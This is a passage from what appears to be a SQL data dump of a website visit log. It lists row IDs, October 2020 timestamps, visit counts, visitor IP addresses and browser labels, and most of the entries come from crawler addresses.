'31.13.103.2','other'),(542061,1602990332,1,1,0,0,'69.171.251.10','other'),(542062,1602990345,1,1,0,0,'66.220.149.4','other'),(542063,1602990522,1,1,0,0,'31.13.115.119','other'),(542064,1602990606,1,1,0,0,'173.252.95.16','other'),(542065,1602990890,1,1,0,0,'31.13.103.2','other'),(542066,1602990891,1,1,0,0,'31.13.103.12','other'),(542067,1602990968,1,1,0,0,'173.252.83.15','other'),(542068,1602991151,1,1,0,0,'69.171.251.27','other'),(542069,1602991158,1,1,0,0,'66.220.149.27','other'),(542070,1602991655,1,1,0,0,'173.252.95.9','other'),(542071,1602991661,1,1,0,0,'31.13.103.8','other'),(542072,1602991812,1,1,0,0,'66.220.149.111','other'),(542073,1602991817,1,1,0,0,'69.171.251.11','other'),(542074,1602992058,1,1,0,0,'69.171.251.21','other'),(542075,1602992559,1,1,0,0,'173.252.95.12','other'),(542076,1602992735,1,1,0,0,'31.13.103.2','other'),(542077,1602992736,1,1,0,0,'31.13.103.10','other'),(542078,1602992976,1,1,0,0,'69.171.251.116','other'),(542079,1602993114,1,1,0,0,'173.252.95.112','other'),(542080,1602993195,1,1,0,0,'173.252.95.4','other'),(542081,1602993356,1,1,0,0,'31.13.103.17','other'),(542082,1602994002,1,1,0,0,'173.252.95.13','other'),(542083,1602994008,1,1,0,0,'173.252.95.5','other'),(542084,1602994012,1,1,0,0,'31.13.103.2','other'),(542085,1602994269,1,1,0,0,'66.220.149.7','other'),(542086,1602994389,2,2,0,0,'173.252.95.19','other'),(542087,1602994520,1,1,0,0,'66.220.149.16','other'),(542088,1602994590,1,1,0,0,'69.171.251.1','other'),(542089,1602995238,1,1,0,0,'31.13.103.7','other'),(542090,1602995251,1,1,0,0,'31.13.115.3','other'),(542091,1602995274,1,1,0,0,'173.252.111.24','other'),(542092,1602995400,1,1,0,0,'173.252.95.5','other'),(542093,1602995623,1,1,0,0,'31.13.103.12','other'),(542094,1602995624,1,1,0,0,'31.13.103.5','other'),(542095,1602995665,1,1,0,0,'66.220.149.120','other'),(542096,1602996410,1,1,0,0,'173.252.95.18','other'),(542097,1602996424,1,1,0,0,'31.13.127.8','other'),(542098,1602996533,1,1,0,0,'31.13.103.116','other'),(542099,1602996657,1,1,0,0,'69.171.251.116','other'),(542100,1602996700,1,1,0,0,'173.252.95.14','other'),(542101,1602996923,1,1,0,0,'173.252.95.9','other'),(542102,1602996933,1,1,0,0,'91.196.178.152','chrome'),(542103,1602996956,1,1,0,0,'173.252.127.25','other'),(542104,1602996974,1,1,0,0,'173.252.95.22','other'),(542105,1602997476,1,1,0,0,'173.252.95.16','other'),(542106,1602997699,1,1,0,0,'173.252.95.10','other'),(542107,1602997900,1,1,0,0,'66.220.149.31','other'),(542108,1602997906,1,1,0,0,'69.171.251.12','other'),(542109,1602997946,1,1,0,0,'173.252.95.9','other'),(542110,1602997967,1,1,0,0,'173.252.95.118','other'),(542111,1602998262,1,1,0,0,'31.13.127.12','other'),(542112,1602998565,1,1,0,0,'173.252.95.111','other'),(542113,1602998970,1,1,0,0,'69.171.251.14','other'),(542114,1602999129,1,1,0,0,'173.252.95.16','other'),(542115,1602999441,1,1,0,0,'66.220.149.31','other'),(542116,1602999516,1,1,0,0,'66.220.149.33','other'),(542117,1602999560,1,1,0,0,'31.13.127.12','other'),(542118,1602999777,1,1,0,0,'31.13.115.14','other'),(542119,1602999872,1,1,0,0,'69.171.251.14','other'),(542120,1602999888,1,1,0,0,'69.171.251.116','other'),(542121,1603000395,1,1,0,0,'173.252.95.7','other'),(542122,1603000397,2,2,0,0,'31.13.127.111','other'),(542123,1603000407,1,1,0,0,'91.196.178.61','chrome'),(542124,1603000415,1,1,0,0,'66.220.149.21','other'),(542125,1603000826,1,1,0,0,'69.171.251.113','other'),(542126,1603000908,1,1,0,0,'173.252.95.23','other'),(542127,1603001020,1,1,0,0,'69.171.251.13','other'),(542128,1603001147,1,1,0,0,'31.13.127.12','other'),(542129,1603001154,1,1,0,0,'46.211.81.219','other'),(542130,1603001255,1,1,0,0,'66.220.149.119','other'),(542131,1603001257,1,1,0,0,'31.13.127.13','other'),(542132,1603001286,1,1,0,0,'173.252.95.3','other'),(542133,1603001343,1,1,0,0,'173.252.95.111','other'),(542134,1603001403,1,1,0,0,'173.252.127.15','other'),(542135,1603001469,1,1,0,0,'69.171.251.21','other'),(542136,1603001470,1,1,0,0,'31.13.127.17','other'),(542137,1603001537,1,1,0,0,'31.13.127.10','other'),(542138,1603001604,1,1,0,0,'66.220.149.19','other'),(542139,1603001658,1,1,0,0,'173.252.95.21','other'),(542140,1603001801,1,1,0,0,'31.13.103.7','other'),(542141,1603001802,1,1,0,0,'31.13.103.119','other'),(542142,1603001993,1,1,0,0,'173.252.95.24','other'),(542143,1603002023,1,1,0,0,'31.13.127.119','other'),(542144,1603002119,1,1,0,0,'173.252.95.17','other'),(542145,1603002502,1,1,0,0,'31.13.127.13','other'),(542146,1603002509,1,1,0,0,'69.171.251.10','other'),(542147,1603002634,1,1,0,0,'173.252.127.2','other'),(542148,1603002863,1,1,0,0,'173.252.95.8','other'),(542149,1603002926,1,1,0,0,'66.220.149.14','other'),(542150,1603002979,1,1,0,0,'66.220.149.16','other'),(542151,1603003055,1,1,0,0,'173.252.95.16','other'),(542152,1603003324,1,1,0,0,'69.171.251.116','other'),(542153,1603003357,1,1,0,0,'31.13.127.2','other'),(542154,1603004020,1,1,0,0,'31.13.127.10','other'),(542155,1603004031,1,1,0,0,'173.252.95.10','other'),(542156,1603004095,2,2,0,0,'31.13.127.8','other'),(542157,1603004144,1,1,0,0,'31.13.103.22','other'),(542158,1603004145,1,1,0,0,'31.13.103.2','other'),(542159,1603004311,1,1,0,0,'31.13.103.19','other'),(542160,1603004371,1,1,0,0,'31.13.127.9','other'),(542161,1603004457,1,1,0,0,'31.13.127.118','other'),(542162,1603004471,1,1,0,0,'69.171.251.119','other'),(542163,1603004480,1,1,0,0,'66.220.149.30','other'),(542164,1603004541,1,1,0,0,'173.252.95.2','other'),(542165,1603004544,1,1,0,0,'31.13.115.117','other'),(542166,1603004610,1,1,0,0,'69.171.251.10','other'),(542167,1603004611,1,1,0,0,'173.252.95.119','other'),(542168,1603004669,1,1,0,0,'173.252.95.9','other'),(542169,1603004797,1,1,0,0,'69.171.251.6','other'),(542170,1603004848,1,1,0,0,'173.252.95.18','other'),(542171,1603004908,1,1,0,0,'66.220.149.10','other'),(542172,1603004922,1,1,0,0,'173.252.95.17','other'),(542173,1603005185,1,1,0,0,'31.13.127.24','other'),(542174,1603005268,1,1,0,0,'66.220.149.21','other'),(542175,1603005403,1,1,0,0,'66.220.149.116','other'),(542176,1603005583,2,2,0,0,'69.171.251.2','other'),(542177,1603005707,1,1,0,0,'5.255.253.87','other'),(542178,1603005963,1,1,0,0,'31.13.127.14','other'),(542179,1603005978,2,2,0,0,'66.220.149.24','other'),(542180,1603006299,1,1,0,0,'173.252.95.14','other'),(542181,1603006324,1,1,0,0,'31.13.127.8','other'),(542182,1603006460,1,1,0,0,'173.252.95.118','other'),(542183,1603006466,1,1,0,0,'69.171.251.24','other'),(542184,1603006574,1,1,0,0,'66.220.149.117','other'),(542185,1603006795,1,1,0,0,'31.13.127.117','other'),(542186,1603007095,1,1,0,0,'66.220.149.26','other'),(542187,1603007173,1,1,0,0,'91.196.178.52','chrome'),(542188,1603007225,1,1,0,0,'173.252.95.10','other'),(542189,1603007478,1,1,0,0,'69.171.251.19','other'),(542190,1603007543,1,1,0,0,'173.252.95.3','other'),(542191,1603007565,1,1,0,0,'31.13.127.20','other'),(542192,1603007667,1,1,0,0,'173.252.95.6','other'),(542193,1603007677,2,2,0,0,'31.13.127.7','other'),(542194,1603007886,1,1,0,0,'66.220.149.120','other'),(542195,1603008073,1,1,0,0,'173.252.111.20','other'),(542196,1603008150,1,1,0,0,'194.44.176.125','chrome'),(542197,1603008250,1,1,0,0,'173.252.95.9','other'),(542198,1603008257,1,1,0,0,'173.252.127.120','other'),(542199,1603008735,1,1,0,0,'173.252.95.21','other'),(542200,1603008744,1,1,0,0,'31.13.127.9','other'),(542201,1603008745,1,1,0,0,'66.220.149.3','other'),(542202,1603008828,1,1,0,0,'69.171.251.5','other'),(542203,1603008836,1,1,0,0,'69.171.251.3','other'),(542204,1603009035,1,1,0,0,'69.171.251.13','other'),(542205,1603009036,1,1,0,0,'173.252.111.22','other'),(542206,1603009142,1,1,0,0,'31.13.115.14','other'),(542207,1603009166,2,2,0,0,'128.124.4.167','chrome'),(542208,1603009180,1,1,0,0,'69.171.251.18','other'),(542209,1603009339,1,1,0,0,'173.252.95.111','other'),(542210,1603009429,1,1,0,0,'69.171.251.22','other'),(542211,1603009523,1,1,0,0,'173.252.107.16','other'),(542212,1603009533,1,1,0,0,'173.252.127.7','other'),(542213,1603009577,1,1,0,0,'173.252.95.4','other'),(542214,1603009581,1,1,0,0,'173.252.95.20','other'),(542215,1603009651,1,1,0,0,'173.252.95.9','other'),(542216,1603009690,1,1,0,0,'31.13.127.13','other'),(542217,1603009772,1,1,0,0,'31.13.115.6','other'),(542218,1603009796,1,1,0,0,'173.252.95.2','other'),(542219,1603009935,1,1,0,0,'31.13.103.8','other'),(542220,1603009936,1,1,0,0,'31.13.103.5','other'),(542221,1603010001,1,1,0,0,'173.252.95.17','other'),(542222,1603010148,1,1,0,0,'66.220.149.119','other'),(542223,1603010243,2,2,0,0,'31.13.127.15','other'),(542224,1603010378,1,1,0,0,'173.252.127.26','other'),(542225,1603010468,1,1,0,0,'173.252.95.22','other'),(542226,1603010489,1,1,0,0,'69.171.251.117','other'),(542227,1603010490,1,1,0,0,'31.13.127.5','other'),(542228,1603010491,1,1,0,0,'31.13.127.111','other'),(542229,1603011309,1,1,0,0,'173.252.127.11','other'),(542230,1603011511,1,1,0,0,'69.171.251.2','other'),(542231,1603011551,1,1,0,0,'173.252.95.4','other'),(542232,1603011597,1,1,0,0,'173.252.95.21','other'),(542233,1603011831,1,1,0,0,'31.13.127.10','other'),(542234,1603012091,2,2,0,0,'173.252.95.119','other'),(542235,1603012144,1,1,0,0,'91.196.178.34','chrome'),(542236,1603012281,1,1,0,0,'173.252.83.5','other'),(542237,1603012282,1,1,0,0,'173.252.83.4','other'),(542238,1603012391,1,1,0,0,'173.252.95.10','other'),(542239,1603012392,1,1,0,0,'31.13.127.14','other'),(542240,1603012395,1,1,0,0,'31.13.127.7','other'),(542241,1603012400,1,1,0,0,'66.220.149.5','other'),(542242,1603012542,1,1,0,0,'173.252.95.116','other'),(542243,1603012546,1,1,0,0,'31.13.127.111','other'),(542244,1603012664,1,1,0,0,'66.220.149.1','other'),(542245,1603012739,1,1,0,0,'31.13.127.20','other'),(542246,1603012984,1,1,0,0,'173.252.95.16','other'),(542247,1603013128,1,1,0,0,'69.171.251.25','other'),(542248,1603013555,1,1,0,0,'69.171.251.3','other'),(542249,1603013615,1,1,0,0,'69.171.251.8','other'),(542250,1603013656,1,1,0,0,'173.252.111.17','other'),(542251,1603013657,1,1,0,0,'173.252.127.119','other'),(542253,1603013704,1,1,0,0,'66.220.149.25','other'),(542254,1603013768,1,1,0,0,'5.255.253.92','other'),(542255,1603013809,1,1,0,0,'173.252.95.116','other'),(542256,1603013810,1,1,0,0,'31.13.127.4','other'),(542257,1603013849,1,1,0,0,'31.13.103.12','other'),(542258,1603013850,1,1,0,0,'31.13.103.19','other'),(542259,1603013981,1,1,0,0,'69.171.251.117','other'),(542260,1603014080,1,1,0,0,'173.252.95.12','other'),(542261,1603014381,1,1,0,0,'31.13.127.24','other'),(542262,1603014543,1,1,0,0,'69.171.251.16','other'),(542263,1603014758,1,1,0,0,'173.252.95.16','other'),(542264,1603014972,1,1,0,0,'173.252.95.120','other'),(542265,1603014997,2,2,0,0,'31.13.127.5','other'),(542266,1603015052,1,1,0,0,'173.252.95.1','other'),(542267,1603015950,1,1,0,0,'173.252.95.116','other'),(542268,1603016107,1,1,0,0,'66.220.149.12','other'),(542269,1603016134,1,1,0,0,'69.171.251.13','other'),(542270,1603016292,1,1,0,0,'173.252.95.2','other'),(542271,1603016330,2,2,0,0,'31.13.127.1','other'),(542272,1603016622,1,1,0,0,'69.171.251.22','other'),(542273,1603016626,1,1,0,0,'69.171.251.116','other'),(542274,1603016815,1,1,0,0,'31.13.127.24','other'),(542275,1603016816,1,1,0,0,'31.13.103.120','other'),(542276,1603017484,1,1,0,0,'69.171.251.1','other'),(542277,1603017491,1,1,0,0,'66.220.149.118','other'),(542278,1603017561,1,1,0,0,'31.13.103.15','other'),(542279,1603017563,1,1,0,0,'31.13.103.3','other'),(542280,1603017788,1,1,0,0,'173.252.127.12','other'),(542281,1603017942,1,1,0,0,'173.252.95.7','other'),(542282,1603017944,1,1,0,0,'31.13.127.21','other'),(542283,1603017984,1,1,0,0,'173.252.95.11','other'),(542284,1603018071,1,1,0,0,'94.153.70.23','chrome'),(542285,1603018622,1,1,0,0,'173.252.127.112','other'),(542286,1603018642,1,1,0,0,'173.252.95.113','other'),(542287,1603018809,1,1,0,0,'173.252.95.21','other'),(542288,1603018850,1,1,0,0,'31.13.127.113','other'),(542289,1603019053,1,1,0,0,'173.252.95.17','other'),(542290,1603019063,1,1,0,0,'31.13.127.10','other'),(542291,1603019073,1,1,0,0,'195.10.210.210','chrome'),(542292,1603019353,2,2,0,0,'173.252.95.11','other'),(542293,1603019354,1,1,0,0,'69.171.251.13','other'),(542295,1603019539,1,1,0,0,'173.252.87.116','other'),(542297,1603019540,1,1,0,0,'173.252.87.12','other'),(542298,1603019940,1,1,0,0,'173.252.95.8','other'),(542299,1603019982,1,1,0,0,'173.252.127.27','other'),(542300,1603019985,1,1,0,0,'69.171.251.119','other'),(542301,1603020000,1,1,0,0,'66.220.149.29','other'),(542302,1603020051,1,1,0,0,'173.252.95.111','other'),(542303,1603020054,1,1,0,0,'31.13.127.8','other'),(542304,1603020390,1,1,0,0,'66.220.149.5','other'),(542305,1603020831,1,1,0,0,'31.13.127.17','other'),(542306,1603020897,1,1,0,0,'66.220.149.8','other'),(542307,1603021040,1,1,0,0,'173.252.95.116','other'),(542308,1603021107,1,1,0,0,'91.196.178.134','other'),(542309,1603021317,1,1,0,0,'31.13.115.22','other'),(542310,1603021349,1,1,0,0,'46.133.221.55','chrome'),(542311,1603021390,1,1,0,0,'69.171.251.120','other'),(542312,1603021720,1,1,0,0,'173.252.95.9','other'),(542313,1603021793,1,1,0,0,'31.13.127.4','other'),(542314,1603021887,1,1,0,0,'173.252.95.16','other'),(542315,1603022634,1,1,0,0,'69.171.251.16','other'),(542316,1603022679,1,1,0,0,'66.220.149.10','other'),(542317,1603022787,1,1,0,0,'31.13.127.22','other'),(542318,1603022990,1,1,0,0,'173.252.127.23','other'),(542319,1603023014,1,1,0,0,'173.252.95.17','other'),(542320,1603023219,1,1,0,0,'66.220.149.16','other'),(542321,1603023300,1,1,0,0,'91.196.178.15','chrome'),(542322,1603023745,1,1,0,0,'173.252.95.3','other'),(542323,1603024131,1,1,0,0,'173.252.95.17','other'),(542324,1603024201,1,1,0,0,'31.13.127.13','other'),(542325,1603024282,1,1,0,0,'69.171.251.9','other'),(542326,1603024292,1,1,0,0,'173.252.95.22','other'),(542327,1603024552,1,1,0,0,'173.252.95.120','other'),(542328,1603024923,1,1,0,0,'31.13.127.1','other'),(542329,1603025225,1,1,0,0,'173.252.127.4','other'),(542330,1603025253,1,1,0,0,'173.252.95.12','other'),(542331,1603025358,1,1,0,0,'173.252.87.20','other'),(542332,1603025359,1,1,0,0,'173.252.87.19','other'),(542333,1603025642,1,1,0,0,'46.211.39.1','chrome'),(542334,1603025919,1,1,0,0,'31.13.127.5','other'),(542335,1603025935,1,1,0,0,'69.171.251.113','other'),(542336,1603026224,1,1,0,0,'173.252.95.118','other'),(542337,1603026226,1,1,0,0,'66.220.149.10','other'),(542338,1603026340,1,1,0,0,'91.196.177.69','chrome'),(542339,1603026835,1,1,0,0,'69.171.251.23','other'),(542340,1603026837,1,1,0,0,'31.13.127.9','other'),(542341,1603027254,1,1,0,0,'173.252.95.118','other'),(542342,1603027392,1,1,0,0,'31.13.127.18','other'),(542343,1603027393,1,1,0,0,'173.252.95.4','other'),(542344,1603027509,1,1,0,0,'66.220.149.11','other'),(542345,1603027519,1,1,0,0,'173.252.127.9','other'),(542346,1603027520,1,1,0,0,'31.13.127.117','other'),(542347,1603028142,1,1,0,0,'69.171.251.2','other'),(542348,1603028143,1,1,0,0,'31.13.127.9','other'),(542349,1603028368,1,1,0,0,'173.252.95.2','other'),(542350,1603028371,1,1,0,0,'31.13.127.15','other'),(542351,1603028648,1,1,0,0,'173.252.95.3','other'),(542352,1603028892,1,1,0,0,'66.220.149.18','other'),(542353,1603028958,1,1,0,0,'69.171.251.13','other'),(542354,1603028986,1,1,0,0,'69.171.251.5','other'),(542355,1603029019,1,1,0,0,'31.13.127.12','other'),(542356,1603029127,1,1,0,0,'173.252.95.12','other'),(542357,1603029282,1,1,0,0,'173.252.83.113','other'),(542358,1603029284,1,1,0,0,'31.13.127.17','other'),(542359,1603029365,1,1,0,0,'173.252.127.7','other'),(542360,1603029546,1,1,0,0,'31.13.127.112','other'),(542361,1603029758,1,1,0,0,'69.171.251.4','other'),(542362,1603029820,1,1,0,0,'31.13.127.6','other'),(542363,1603029854,1,1,0,0,'173.252.95.13','other'),(542364,1603029962,1,1,0,0,'69.171.251.9','other'),(542365,1603030363,1,1,0,0,'173.252.95.6','other'),(542366,1603030835,1,1,0,0,'69.171.251.4','other'),(542367,1603030838,1,1,0,0,'173.252.95.120','other'),(542368,1603030844,1,1,0,0,'31.13.127.118','other'),(542369,1603031266,1,1,0,0,'31.13.127.9','other'),(542370,1603031531,1,1,0,0,'173.252.95.7','other'),(542371,1603031569,1,1,0,0,'173.252.95.116','other'),(542372,1603031633,1,1,0,0,'173.252.127.1','other'),(542373,1603031634,1,1,0,0,'31.13.127.120','other'),(542374,1603031659,1,1,0,0,'69.171.251.14','other'),(542375,1603031672,1,1,0,0,'173.252.95.11','other'),(542376,1603031676,1,1,0,0,'66.220.149.30','other'),(542377,1603031858,1,1,0,0,'69.171.251.7','other'),(542378,1603031866,1,1,0,0,'31.13.127.7','other'),(542379,1603032315,1,1,0,0,'173.252.95.14','other'),(542380,1603032421,1,1,0,0,'69.171.251.113','other'),(542381,1603032432,1,1,0,0,'66.220.149.118','other'),(542382,1603032458,1,1,0,0,'173.252.127.23','other'),(542383,1603032504,1,1,0,0,'66.220.149.3','other'),(542384,1603032584,1,1,0,0,'69.171.251.14','other'),(542385,1603032613,1,1,0,0,'173.252.95.116','other'),(542386,1603032835,1,1,0,0,'31.13.127.4','other'),(542387,1603033145,1,1,0,0,'66.220.149.120','other'),(542388,1603033258,1,1,0,0,'66.220.149.13','other'),(542389,1603033351,1,1,0,0,'173.252.95.19','other'),(542390,1603033379,1,1,0,0,'173.252.95.18','other'),(542391,1603033380,1,1,0,0,'173.252.95.12','other'),(542392,1603033443,1,1,0,0,'31.13.127.14','other'),(542393,1603033445,1,1,0,0,'173.252.95.26','other'),(542394,1603033664,1,1,0,0,'31.13.127.12','other'),(542395,1603033929,1,1,0,0,'173.252.95.16','other'),(542396,1603033999,1,1,0,0,'31.13.103.4','other'),(542397,1603034097,1,1,0,0,'173.252.95.2','other'),(542398,1603034098,1,1,0,0,'173.252.95.9','other'),(542399,1603034141,1,1,0,0,'31.13.115.20','other'),(542400,1603034348,1,1,0,0,'173.252.95.116','other'),(542401,1603034381,1,1,0,0,'31.13.127.119','other'),(542402,1603034428,2,2,0,0,'91.196.178.25','chrome'),(542403,1603034475,1,1,0,0,'173.252.95.7','other'),(542404,1603034632,1,1,0,0,'31.13.127.22','other'),(542405,1603034638,1,1,0,0,'173.252.95.21','other'),(542406,1603034669,1,1,0,0,'66.220.149.31','other'),(542407,1603034677,1,1,0,0,'69.171.251.5','other'),(542408,1603035115,1,1,0,0,'69.171.251.10','other'),(542409,1603035211,1,1,0,0,'173.252.95.24','other'),(542410,1603035304,1,1,0,0,'31.13.127.5','other'),(542411,1603035342,1,1,0,0,'69.171.251.117','other'),(542412,1603035522,1,1,0,0,'31.13.115.7','other'),(542413,1603035608,1,1,0,0,'69.171.251.3','other'),(542414,1603035615,1,1,0,0,'31.13.127.18','other'),(542415,1603035667,1,1,0,0,'66.220.149.21','other'),(542416,1603035941,1,1,0,0,'173.252.95.5','other'),(542417,1603036014,1,1,0,0,'173.252.127.13','other'),(542418,1603036015,1,1,0,0,'69.171.251.23','other'),(542419,1603036082,1,1,0,0,'173.252.95.4','other'),(542420,1603036480,1,1,0,0,'173.252.95.119','other'),(542421,1603037193,1,1,0,0,'173.252.95.4','other'),(542422,1603037196,1,1,0,0,'31.13.127.19','other'),(542423,1603037214,1,1,0,0,'173.252.95.16','other'),(542424,1603037357,1,1,0,0,'173.252.95.117','other'),(542425,1603037371,1,1,0,0,'31.13.103.23','other'),(542426,1603037388,1,1,0,0,'31.13.127.24','other'),(542427,1603037540,1,1,0,0,'31.13.115.15','other'),(542428,1603037747,1,1,0,0,'91.196.121.157','chrome'),(542429,1603037828,1,1,0,0,'66.220.149.5','other'),(542430,1603037906,1,1,0,0,'173.252.127.6','other'),(542431,1603038081,1,1,0,0,'173.252.95.116','other'),(542432,1603038166,1,1,0,0,'173.252.95.14','other'),(542433,1603038326,1,1,0,0,'31.13.127.20','other'),(542434,1603038764,1,1,0,0,'31.13.127.23','other'),(542435,1603038938,1,1,0,0,'173.252.95.16','other'),(542436,1603039113,1,1,0,0,'173.252.95.118','other'),(542437,1603039137,1,1,0,0,'31.13.127.8','other'),(542438,1603039177,1,1,0,0,'173.252.95.116','other'),(542439,1603039192,1,1,0,0,'69.171.251.21','other'),(542440,1603039242,1,1,0,0,'31.13.103.19','other'),(542441,1603039419,1,1,0,0,'66.220.149.3','other'),(542442,1603039459,1,1,0,0,'66.220.149.13','other'),(542443,1603039855,1,1,0,0,'173.252.95.11','other'),(542444,1603039960,2,2,0,0,'173.252.95.22','other'),(542445,1603040118,1,1,0,0,'31.13.127.21','other'),(542446,1603040305,1,1,0,0,'31.13.127.113','other'),(542447,1603040607,1,1,0,0,'66.220.149.111','other'),(542448,1603040824,1,1,0,0,'69.171.251.15','other'),(542449,1603040850,1,1,0,0,'31.13.127.6','other'),(542450,1603041347,1,1,0,0,'173.252.95.116','other'),(542451,1603041410,1,1,0,0,'173.252.95.23','other'),(542452,1603041411,1,1,0,0,'31.13.103.17','other'),(542453,1603041476,1,1,0,0,'173.252.95.12','other'),(542454,1603041484,1,1,0,0,'69.171.251.118','other'),(542455,1603041501,1,1,0,0,'66.220.149.30','other'),(542456,1603041672,1,1,0,0,'31.13.127.7','other'),(542457,1603042185,1,1,0,0,'66.220.149.113','other'),(542458,1603042216,1,1,0,0,'66.220.149.28','other'),(542459,1603042313,1,1,0,0,'173.252.111.117','other'),(542460,1603042360,1,1,0,0,'173.252.95.111','other'),(542461,1603042605,1,1,0,0,'69.171.251.1','other'),(542462,1603042611,1,1,0,0,'31.13.127.4','other'),(542463,1603042701,1,1,0,0,'173.252.95.3','other'),(542464,1603043078,1,1,0,0,'173.252.127.16','other'),(542465,1603043616,1,1,0,0,'31.13.127.5','other'),(542466,1603043651,1,1,0,0,'173.252.95.6','other'),(542467,1603043893,1,1,0,0,'66.220.149.14','other'),(542468,1603043983,1,1,0,0,'173.252.95.119','other'),(542469,1603044207,1,1,0,0,'69.171.251.21','other'),(542470,1603044245,1,1,0,0,'173.252.95.22','other'),(542471,1603044534,1,1,0,0,'31.13.127.18','other'),(542472,1603044535,1,1,0,0,'173.252.127.7','other'),(542473,1603044597,1,1,0,0,'173.252.95.20','other'),(542474,1603044964,1,1,0,0,'66.220.149.23','other'),(542475,1603045265,1,1,0,0,'173.252.95.22','other'),(542476,1603045290,1,1,0,0,'31.13.127.112','other'),(542477,1603045408,1,1,0,0,'69.171.251.23','other'),(542478,1603045415,1,1,0,0,'173.252.95.26','other'),(542479,1603045538,1,1,0,0,'173.252.95.15','other'),(542480,1603045591,1,1,0,0,'69.171.251.2','other'),(542481,1603045712,1,1,0,0,'69.171.251.18','other'),(542482,1603045719,1,1,0,0,'173.252.95.12','other'),(542483,1603045766,1,1,0,0,'31.13.127.111','other'),(542484,1603045990,1,1,0,0,'66.220.149.32','other'),(542485,1603046109,1,1,0,0,'69.171.251.113','other'),(542486,1603046118,1,1,0,0,'91.196.178.42','chrome'),(542487,1603046131,1,1,0,0,'173.252.95.9','other'),(542488,1603046288,1,1,0,0,'31.13.127.6','other'),(542489,1603046598,1,1,0,0,'173.252.95.19','other'),(542490,1603046668,1,1,0,0,'31.13.127.23','other'),(542491,1603047079,1,1,0,0,'31.13.127.113','other'),(542492,1603047190,1,1,0,0,'185.237.217.17','chrome'),(542493,1603047237,1,1,0,0,'173.252.95.26','other'),(542494,1603047365,1,1,0,0,'173.252.111.19','other'),(542495,1603047535,1,1,0,0,'173.252.95.25','other'),(542496,1603047539,1,1,0,0,'31.13.127.8','other'),(542497,1603047935,1,1,0,0,'31.13.127.119','other'),(542498,1603048095,1,1,0,0,'173.252.95.20','other'),(542499,1603048096,1,1,0,0,'69.171.251.14','other'),(542500,1603048226,1,1,0,0,'173.252.127.37','other'),(542501,1603048308,1,1,0,0,'31.13.127.5','other'),(542503,1603048458,1,1,0,0,'178.92.84.146','chrome'),(542504,1603048546,1,1,0,0,'66.220.149.14','other'),(542505,1603048607,1,1,0,0,'66.220.149.31','other'),(542506,1603048722,1,1,0,0,'69.171.251.12','other'),(542507,1603048735,1,1,0,0,'31.13.115.14','other'),(542508,1603048802,1,1,0,0,'31.13.127.1','other'),(542509,1603048955,1,1,0,0,'31.13.127.23','other'),(542510,1603048962,1,1,0,0,'173.252.95.1','other'),(542511,1603049189,1,1,0,0,'173.252.95.25','other'),(542512,1603049192,1,1,0,0,'173.252.95.20','other'),(542514,1603049311,1,1,0,0,'173.252.95.13','other'),(542515,1603049594,1,1,0,0,'69.171.251.24','other'),(542516,1603049617,1,1,0,0,'66.220.149.11','other'),(542517,1603049624,1,1,0,0,'31.13.127.14','other'),(542518,1603049700,1,1,0,0,'31.13.127.2','other'),(542519,1603049739,1,1,0,0,'173.252.95.2','other'),(542520,1603049875,1,1,0,0,'69.171.251.13','other'),(542521,1603050562,1,1,0,0,'173.252.95.10','other'),(542522,1603051245,1,1,0,0,'31.13.127.117','other'),(542523,1603051346,1,1,0,0,'173.252.95.118','other'),(542524,1603051924,1,1,0,0,'66.220.149.24','other'),(542525,1603051982,1,1,0,0,'31.13.127.116','other'),(542526,1603052209,1,1,0,0,'69.171.251.8','other'),(542527,1603052309,1,1,0,0,'173.252.95.117','other'),(542528,1603054259,1,1,0,0,'173.252.95.10','other'),(542529,1603054492,1,1,0,0,'31.13.127.12','other'),(542530,1603054635,1,1,0,0,'66.220.149.9','other'),(542531,1603054686,1,1,0,0,'69.171.251.19','other'),(542532,1603055583,1,1,0,0,'31.13.127.8','other'),(542533,1603056219,1,1,0,0,'69.171.251.27','other'),(542534,1603056220,1,1,0,0,'69.171.251.119','other'),(542535,1603056538,1,1,0,0,'31.13.127.18','other'),(542536,1603056698,1,1,0,0,'173.252.95.3','other'),(542537,1603056978,1,1,0,0,'69.171.251.116','other'),(542538,1603056981,1,1,0,0,'69.171.251.11','other'),(542539,1603057245,1,1,0,0,'173.252.107.15','other'),(542540,1603057246,1,1,0,0,'173.252.107.8','other'),(542541,1603058316,1,1,0,0,'31.13.127.17','other'),(542542,1603059337,1,0,1,0,'66.249.66.91',''),(542543,1603061050,1,1,0,0,'173.252.95.18','other'),(542544,1603061318,1,1,0,0,'31.13.127.118','other'),(542545,1603062477,1,1,0,0,'31.13.127.117','other'),(542546,1603063430,1,1,0,0,'31.13.103.120','other'),(542548,1603064941,1,1,0,0,'31.13.127.111','other'),(542549,1603067596,1,1,0,0,'173.252.95.6','other'),(542550,1603069766,1,1,0,0,'173.252.87.21','other'),(542551,1603069769,1,1,0,0,'173.252.87.14','other'),(542552,1603070295,1,1,0,0,'69.171.251.13','other'),(542553,1603070296,1,1,0,0,'69.171.251.111','other'),(542554,1603072672,1,1,0,0,'69.171.251.18','other'),(542555,1603072890,1,1,0,0,'69.171.251.116','other'),(542556,1603072891,1,1,0,0,'69.171.251.19','other'),(542557,1603074238,1,1,0,0,'31.13.103.8','other'),(542558,1603075192,1,1,0,0,'173.252.95.116','other'),(542559,1603075194,1,1,0,0,'173.252.95.20','other'),(542560,1603077138,1,1,0,0,'69.171.251.9','other'),(542561,1603078655,1,1,0,0,'173.252.95.15','other'),(542562,1603079034,1,1,0,0,'173.252.95.13','other'),(542563,1603079047,1,1,0,0,'31.13.115.23','other'),(542564,1603079376,1,1,0,0,'173.252.95.119','other'),(542565,1603082673,1,1,0,0,'31.13.127.5','other'),(542566,1603083125,1,1,0,0,'62.205.136.69','chrome'),(542567,1603084662,2,2,0,0,'173.252.95.16','other'),(542568,1603085507,1,1,0,0,'31.13.127.21','other'),(542569,1603086414,1,1,0,0,'31.13.127.120','other'),(542570,1603086930,1,1,0,0,'173.252.95.111','other'),(542571,1603087176,1,1,0,0,'31.13.103.120','other'),(542572,1603087178,1,1,0,0,'31.13.103.2','other'),(542573,1603087424,1,1,0,0,'31.13.103.8','other'),(542574,1603087425,1,1,0,0,'31.13.103.22','other'),(542575,1603087711,1,1,0,0,'173.252.95.24','other'),(542577,1603088179,1,1,0,0,'69.171.251.6','other'),(542578,1603088511,1,1,0,0,'31.13.127.5','other'),(542579,1603088725,1,1,0,0,'91.196.178.25','chrome'),(542580,1603088761,2,2,0,0,'31.13.127.15','other'),(542581,1603088762,1,1,0,0,'31.13.127.6','other'),(542582,1603088767,2,2,0,0,'31.13.127.4','other'),(542583,1603088769,1,1,0,0